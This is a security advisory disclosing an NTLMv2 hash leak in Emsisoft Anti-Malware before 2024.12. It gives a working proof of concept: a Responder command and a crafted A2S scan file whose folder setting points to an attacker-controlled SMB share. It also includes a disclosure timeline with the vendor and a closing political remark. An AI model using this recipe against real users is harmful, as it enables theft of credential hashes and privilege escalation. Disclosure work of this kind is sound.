# Title: Emsisoft Anti-Malware < 2024.12 - ".A2S" Net-NTLMv2 Hash Information Disclosure # Date: 17.01.2025 # Author: M. Akil Gündoğan # Vendor Homepage: https://www.emsisoft.com # Affected Version: < 2024.12 # Tested Version: 2024.9.0.12546 # Tested on: Windows 10 Pro x64 # Vulnerability Description: -------------------------------------- A vulnerability affecting the scanning module in Emsisoft Anti-Malware < 2024.12 allows attackers on a remote server to obtain Net-NTLMv2 hash information via specially created A2S (Emsisoft Custom Scan) extension file. Under normal circumstances, when Windows attempts to connect to a remote SMB server, it exhibits a behavior of transmitting the valid NTLM hash information of the target. For instance, an attacker can exploit this by crafting a malicious LNK file. When the victim right-clicks or left-clicks on this LNK file, the NTLMv2 hash information of the respective system is transmitted to the attacker. What makes this a specific vulnerability in Emsisoft is that it can be executed through an A2S file—a trusted, double-clickable file—without raising any suspicion from the user. The victim clicks on the A2S file, Emsisoft launches an normal looking scanning window, and the attacker successfully obtains the NTLMv2 hash information. Extremely simple but effective. # Technical details and step by step Proof of Concept's (PoC): -------------------------------------- 1 - As an attacker, create a fake SMB server using the responder tool on a remote server. For this, after installing the responder tool, you can run it using the following command: responder -I eth0 2 - Create an A2S file and save its contents as follows: [Settings] Preset=4 Folders=;\\192.168.251.131\tmp\; ------------------------------> Here be the IP address of the attacker. NTFS=1 Memory=0 Traces=0 DetectPUPs=1 Archives=1 MailArchives=0 3 - When the victim clicks on this specially created scan file, the attacker will obtain the valid NTLMv2 hash. # Impact: -------------------------------------- If the attacker breaks the NTLM relay or hash, they can achieve privilege escalation depending on the user's role. Additionally, the corresponding anti-malware solution can be used as a reliable NTLMv2 hash dump tool. # Advisories: -------------------------------------- It is recommended to use alternative security solutions. # Timeline: -------------------------------------- - 30.09.2024: - The vulnerability was reported. - Emsisoft sent a thank you message and said that they would inform us after the final decision. - 30.10.2024: - Since 30 days had passed, we asked if there was any progress. The response time on the Emsisoft Bug Bounty page was 10 days. - We have been informed by Emsisoft that a fix is being tested and when it is deployed we will receive an email to test it. - 06.12.2024: - Emsisoft sent us an email saying that they have provided a fix with version 2024.12 and asked us to test it. - We tested the relevant version and offered alternative solutions. - Emsisoft informed us that our alternative solution suggestions will be forwarded to the developer team. They also said that credit will be given for the vulnerability we discovered. - 14.01.2025: - Since 38 days have passed, we asked for an update on our vulnerability report. - Emsisoft said that the feature will be deprecated soon. In version 2025.1, we were informed that a notification was added that this feature will be removed. - In this case, we asked for the latest status of our report. When we reported the vulnerability, we said that this feature was available. - Emsisoft, after review with the development team, responded that their final decision was that this was not a vulnerability. - We told them that they had acknowledged the vulnerability from the first submission and reminded them that they wanted us to test the fix. - Emsisoft again sent an email saying that they did not think it was a security vulnerability. - 15.01.2025: - We reminded them that they were following a silent patching method and informed them that they were conducting an unethical process. - Emsisoft informed us that as time progressed after the report was reported, they realized that it was Windows-related and therefore did not consider it as a vulnerability. - 17.01.2025 - Full disclosure. # References: -------------------------------------- - PoC Videos: https://youtu.be/LxaYtxdJLM4 # Notes: -------------------------------------- - Free Palestine, Free Gaza! - History will judge those who do not oppose this genocide!